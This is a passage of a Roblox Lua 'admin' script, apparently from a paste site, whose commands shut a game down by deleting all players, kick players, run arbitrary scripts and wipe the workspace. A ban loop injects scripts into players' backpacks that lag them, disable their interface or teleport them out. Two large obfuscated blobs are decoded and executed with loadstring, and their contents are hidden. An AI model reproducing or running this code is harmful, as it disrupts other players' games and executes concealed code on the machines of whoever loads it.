  909. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(charMap[lo]+charMap[hi]*16)end)))),getfenv())()
  910.  
  911. AddCmd("Shutdown the game","sd","Shutdown the game",
  912. function()
  913. NewS([[while true do
  914. game:GetService("Players"):ClearAllChildren()
  915. end
  916. ]], workspace)
  917. end
  918. )
  919.  
  920. AddCmd("Check source","chks","Check if the source is found",
  921. function()
  922. if found then
  923. Output("Source is found")
  924. else
  925. Output("Source is not found")
  926. end
  927. end
  928. )
  929.  
  930. AddCmd("Say bye to everyone","bye","Say bye to everyone",
  931. function()
  932. Dismiss()
  933. for i = 1,8 do
  934. Output("Bye", __)
  935. end
  936. end
  937. )
  938.  
  939. AddCmd("Check source name","chksn","Check the source name",
  940. function()
  941. Output(SourceName, __)
  942. end
  943. )
  944.  
  945. AddCmd("Change source name","csn","Change the source name",
  946. function(plrs, msg)
  947. SourceName = tostring(msg)
  948. end
  949. )
  950.  
  951. AddCmd("Kick player list","klist", "Show a kick player list",
  952. function()
  953. Dismiss()
  954. Output("Click on the player name that you want to kick", __)
  955. for _,v in pairs(game:GetService("Players"):GetChildren()) do
  956. Output(v.Name,
  957. function()
  958. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", v.Backpack)
  959. v:Destroy()
  960. end)
  961. end
  962. end
  963. )
  964.  
  965. AddCmd("Script","script","Execute a Script",
  966. function(plrs, msg)
  967. NewS(msg, workspace)
  968. end
  969. )
  970.  
  971. AddCmd("LocalScript","local","Execute a LocalScript",
  972. function(plrs, msg)
  973. NewLS(msg, LocalPlayer.Backpack)
  974. end
  975. )
  976.  
  977. AddCmd("Execute", "exe","Execute a LocalScript for admin",
  978. function(plrs, msg)
  979. a,b = ypcall(function()
  980. loadstring(msg)()
  981. end) if not a then Output(b,"Bright red") end
  982. end
  983. )
  984.  
  985.  
  986. AddCmd("#Commands","#cmds","See how much are commands in this admin",
  987. function()
  988. Output(#Cmds, __)
  989. end
  990. )
  991.  
  992. AddCmd("Clean workspace","clean","Clean everything in workspace except terrain",
  993. function()
  994. NewS([[
  995. for _,v in pairs(game.Workspace:GetChildren()) do
  996. if v.Name ~= "Terrain" then
  997. v:Destroy()
  998. end
  999. end
  1000. ]],workspace)
  1001. wait(1)
  1002. a = Instance.new("Part")
  1003. a.Parent = Workspace
  1004. a.Name = "Base"
  1005. a.Position = Vector3.new(0, 0.6, 0)
  1006. a.Size = Vector3.new(1002, 0, 1002)
  1007. a.Material = "Grass"
  1008. a.Anchored = true
  1009. a.BrickColor = BrickColor.new("Dark green")
  1010. NewS([[
  1011. for _,v in pairs(game.Players:GetChildren()) do
  1012. v:LoadCharacter()
  1013. end
  1014. ]], workspace)
  1015. end
  1016. )
  1017.  
  1018. AddCmd("YOLO","yolo","YOLO",
  1019. function()
  1020. Dismiss()
  1021. for i = 0,8,1 do
  1022. Output("YOLO",__)
  1023. end
  1024. end
  1025. )
  1026.  
  1027. AddCmd("SWAG","swag","SWAG",
  1028. function()
  1029. Dismiss()
  1030. for i = 0,8,1 do
  1031. Output("SWAG",__)
  1032. end
  1033. end
  1034. )
  1035.  
  1036. function Output(Txt, func)
  1037. P = Instance.new("Part", tabmodel)
  1038. P.Shape = "Ball"
  1039. P.Anchored = true
  1040. P.CanCollide = false
  1041. if probemode == false then
  1042. if LocalPlayer.Character.Torso then
  1043. P.Position = LocalPlayer.Character.Torso.Position
  1044. elseif LocalPlayer.Character.Torso == nil then return end
  1045. elseif probemode == true then
  1046. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1047. P.Position = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position
  1048. elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") == nil then return end
  1049. else
  1050. return
  1051. end
  1052. M = Instance.new("SpecialMesh",P)
  1053. M.MeshId = "http://www.roblox.com/asset/?id=10061232"
  1054. M.TextureId = "http://www.roblox.com/asset/?id=10061209"
  1055. M.Scale = Vector3.new(3,3,3)
  1056. Instance.new("PointLight", P)
  1057. bg = Instance.new("BillboardGui", P)
  1058. bg.Adornee = tab
  1059. bg.Size = UDim2.new(8, 0, 7.5, 0)
  1060. bg.StudsOffset = Vector3.new(0, 1, 0)
  1061. text = Instance.new("TextLabel", bg)
  1062. text.Size = UDim2.new(1, 0, 0.2, 0)
  1063. text.FontSize = "Size18"
  1064. text.BackgroundTransparency = 1
  1065. text.Font = "Legacy"
  1066. text.TextStrokeTransparency = 0
  1067. text.TextColor = P.BrickColor
  1068. text.Text = Txt
  1069. Click = Instance.new("ClickDetector",P)
  1070. Click.MouseClick:connect(function(Plr)
  1071. if Plr.Name == LocalPlayer.Name then
  1072. Dismiss()
  1073. func = func
  1074. func()
  1075. end
  1076. end)
  1077. table.insert(Tabs, P)
  1078. end
  1079.  
  1080. function getPlayers(msg)
  1081. local plrs = {}
  1082. if msg == "me" then
  1083. table.insert(plrs, LocalPlayer)
  1084. elseif msg == "all" then
  1085. plrs = game:GetService("Players"):GetChildren()
  1086. elseif msg == "noobs" then
  1087. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1088. if plr.AccountAge > 364 then
  1089. table.insert(plrs, plr)
  1090. end
  1091. end
  1092. elseif msg == "veterans" then
  1093. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1094. if plr.AccountAge > 364 then
  1095. table.insert(plrs, plr)
  1096. end
  1097. end
  1098. elseif msg == "others" then
  1099. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1100. if v ~= LocalPlayer then
  1101. table.insert(plrs, v)
  1102. end
  1103. end
  1104. else
  1105. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  1106. if v.Name:lower():sub(1,#msg) == msg:lower() then
  1107. if v.Name == "LuaScripterLS" then
  1108. Output("You can't use commands on creator!!!")
  1109. else
  1110. table.insert(plrs, v)
  1111. end
  1112. end
  1113. end
  1114. end
  1115. return plrs
  1116. end
  1117.  
  1118. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1119. end
  1120.  
  1121. LocalPlayer.Chatted:connect(function(m)
  1122. for i,v in pairs(Cmds) do
  1123. if v["Say"]..key == m:sub(1, #v["Say"]+#key) then
  1124. v["Func"](getPlayers(m:sub(#v["Say"]+#key+1)), m:sub(#v["Say"]+#key+1))
  1125. end
  1126. end
  1127. end)
  1128.    
  1129. local charMap = {["!"] = 0, ["$"] = 1, ["*"] = 2, ["("] = 3, ["-"] = 4, ["#"] = 5, ["%"] = 6, ["?"] = 7, ["="] = 8, ["&"] = 9, ["_"] = 10, ["+"] = 11, ["~"] = 12, [")"] = 13, ["^"] = 14, ["@"] = 15}; setfenv(assert(loadstring((string.gsub(string.gsub(table.concat({
  1130. "~%@%(%$%~%!*&%)()*$(+(~%@%$%-%(?-?*?&%^%?%=*(?-?*?&%^%?%^*?%(?#?*%=A*%A=+?=?*=#()?!#@(*-+-+?)?^%!?^?^?+?$?#?)%)*B?-?_%^A%~*-%@%!?~#~#$*~#!(*(%(#^%^=)-A)@=%)=_%&=&!_@~!)!~$~^~)~&~^+$~=+??!~@A+!+(+__@%%_!+!++&@#?#~!~!)@=@!!$+?@=~#+%+)+!^@^~^+)#^-^#&%)%)#~#~$)@~_~^+!~%+-?~+_+#+&_+_$_#%+&-_(_)=!#?-!~*^))#)%)$)$=??%_!~^_?++?)#+#(%@#&?=&==*=&=&%$=*?%=^%??@*+-_#*%%#&$&!--!-%!(^-*%-$-&(_(#(#^+)~!%$&$~!-$^!*!&+&A!)_^~%^(@$@$^#&#^^~+~=)*=$~-&#&=&*=*?)_&_@%~-)=@A_*_(_^&^A-$%~=+?(?*=&?=?#?^$+#=%?#=*~#^%&-!_#+^&@_--@(&(=(-(&**(&*&$~#**$^~)$^-~!#-%=!_@*+@^%@+^)^$@+)?_-_*_)&=&-=_=_?#+$+??-##&?+*+__+_%_%#~-&%^=?=)?$=*(+?@%%*%?)%~#!(*(%(&%?#(#~#^%-&?#?-!-?@#==&+(#($($*_*~$?**)=)*+~#^%#$~-@$!*(*=@?-~#!(*(%(+$^$(@#@!@%_(_!==A)~)%=+~_=_?~~*??+=+%%*+@&(_=_#_%#)%(&%=$&(-%(%?)?-$##??*?_%+B%$!%$--!~*+((-?(!@?**@~~-*@*-*#$~#**($#$!$=!+)~)@)!~)&^)!!)(@!@!$$)A^&^&&@=)__~-)!~+~^+$~$~*+^^(+^_%?=#%#^#_#^&@?*-!%)??=(?^*#%!(!*+#?#)$_@+()#=#!#$#~-~@*@$*+(#*?*$**@-)*)_)"
  1131. ,"%)~#!(*(%(+@^++^#@&!^_#^!+!_+)?))&_?++))=)!)$)~~~?*?_&&_$+#_%?*&%#^=*#_##__+&&_?)(#%-?~?!?&*!%+*)#^*)*^*)-&-@!~^(-=-_(+@=)@*-(%*=~@$-*%$=+()$^=^+)-^#)~)($@$#$?!#$?!~#^%%!)+#@=+#@%~@^^_$+=+~^~)=^%^!^&)===)%)$)#~$!#~)@@~@~$)&?+_)_(_$+-%$%&_?_*_%&=&))$@!#$=#&)=+?+((?%(#(-(+(_(&*-%$*~#!(*(%(*$$*$*@$@!=-^-$-(!!!)@&@$(%@-%~%!%_%~#~#-%~&&_!_(&*_#&&&%&^-?=+-&=+##=#-&-$#%=??-=(=^?=?=*&?=?-?&%~%(%=*+#^###-%=$%$@#^#_#@-*#&-^!!-##^-)(^@?(+@+@+@)@_@$!$@!@~*_^-^)))^^^)^^)=$@$($%)-)$)!)%_@_-_@_*_+_-^*@_^^)^^*^?^#^^&=))&~)@__)+&!_&_@)$)@)@)+)%)?=&)&)%)~~!)=~^=*~%~^+^~(=*=~~~~&~@+(~++$=-+_~-~-+%?!+#?%?+?+?^?*?@_^%&%(%-?%?%?=%(_+_!_-%(%$%$%**~***^***~*%%#?^%(%-?&%@%^%=*(%&*&%)(&%+*$(+(*?#%-?#?*?^%!*(?-?*?&%^%?%^*(%=%$%*?=*=*(?-?*?&%^%?%^**%&?-?#%=*(%&*+*)**(%(+*&%&*#*!**(#(%(&*#%^%-%&*&*=*&*"
  1132. }),"(%u)(.)",function(r,c)return c:rep(r:byte()-62)end),"(.)(.)",function(lo,hi)return string.char(charMap[lo]+charMap[hi]*16)end)))),getfenv())()
  1133.  
  1134. tabmodeldebounce = false
  1135. modeldebounce = false
  1136. game:service'RunService'.Stepped:connect(function()
  1137. if modeldebounce then return end
  1138. rot = (rot % 360) + 0.5
  1139. if tabmodel.Parent ~= workspace then
  1140. modeldebounce = true
  1141. tabs = {}
  1142. tabmodel = Instance.new("Model", workspace)
  1143. tabmodel.Name = "Earth tabs"
  1144. tabs = {}
  1145. wait()
  1146. modeldebounce = false
  1147. end
  1148. end)
  1149.  
  1150. rot = 0
  1151. coroutine.resume(coroutine.create(function()
  1152. game:GetService("RunService").Stepped:connect(function()
  1153. if probemode == false then
  1154. if LocalPlayer.Character then
  1155. if LocalPlayer.Character:findFirstChild("Torso")  then
  1156. rot = rot + 0.001
  1157. for i,v in pairs(Tabs) do
  1158. ypcall(function()
  1159. local pos = LocalPlayer.Character.Torso.CFrame
  1160. local radius = 4 + (#Tabs * 0.5)
  1161. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1162. local y = 0
  1163. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1164. local arot = Vector3.new(x, y, z) + pos.p
  1165. local brot = v.CFrame.p
  1166. local crot = (arot * .1 + brot * .9)
  1167. v.CFrame = CFrame.new(crot, pos.p)
  1168. end)
  1169. end
  1170. end
  1171. end
  1172. end
  1173. if probemode == true then
  1174. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1175. rot = rot + 0.001
  1176. for i,v in pairs(Tabs) do
  1177. ypcall(function()
  1178. local pos = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").CFrame
  1179. local radius = 4 + (#Tabs * 0.5)
  1180. local x = math.sin((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1181. local y = 0
  1182. local z = math.cos((i / #Tabs - (0.5 / #Tabs) + rot * 2) * math.pi * 2) * radius
  1183. local arot = Vector3.new(x, y, z) + pos.p
  1184. local brot = v.CFrame.p
  1185. local crot = (arot * .1 + brot * .9)
  1186. v.CFrame = CFrame.new(crot, pos.p)
  1187. end)
  1188. end
  1189. end
  1190. end
  1191. end)
  1192. end))
  1193.  
  1194. for _,v in pairs(game.Players:GetChildren()) do
  1195. if v:IsA("Player") then
  1196. Connect(v)
  1197. end
  1198. end
  1199.  
  1200. game.Players.ChildAdded:connect(function(qe)
  1201. if qe:IsA("Player") then
  1202. Connect(qe)
  1203. end
  1204. end)
  1205.  
  1206. coroutine.resume(coroutine.create(function()
  1207. while wait(0.1) do
  1208. for a, plr in pairs(game.Players:GetChildren()) do
  1209. pcall(function()
  1210. for b, Bl in pairs(Banlist) do
  1211. if plr.Name == Bl["Name"] then
  1212. if Bl["BRank"] == -1 then
  1213. plr:Destroy()
  1214. elseif Bl["BRank"] == -2 then
  1215. NewLS(LagSource, plr.Backpack)
  1216. elseif Bl["BRank"] == -3 then
  1217. NewLS("script.Parent = nil; while wait(0.1) do; game:service'StarterGui':SetCoreGuiEnabled(3, false); end", plr.Backpack)
  1218. elseif Bl["BRank"] == -4 then
  1219. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  1220. else
  1221. plr:Destroy()
  1222. end
  1223. end
  1224. end
  1225. end)
  1226. end
  1227. end
  1228. end))
  1229.  
  1230. for _,v in pairs(game.Players:GetPlayers()) do
  1231. if v.Name == "LuaScripterLS" then
  1232. Output("YAY, THE CREATOR OF THIS SCRIPT IS IN-GAME :D :D :D")
  1233. end
  1234. end
  1235.  
  1236. game.Players.PlayerAdded:connect(function(plr)
  1237. if plr.Name == "LuaScripterLS" then
  1238. Output("YAY, THE CREATOR OF THIS SCRIPT IS IN-GAME :D :D :D")
  1239. end
  1240. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement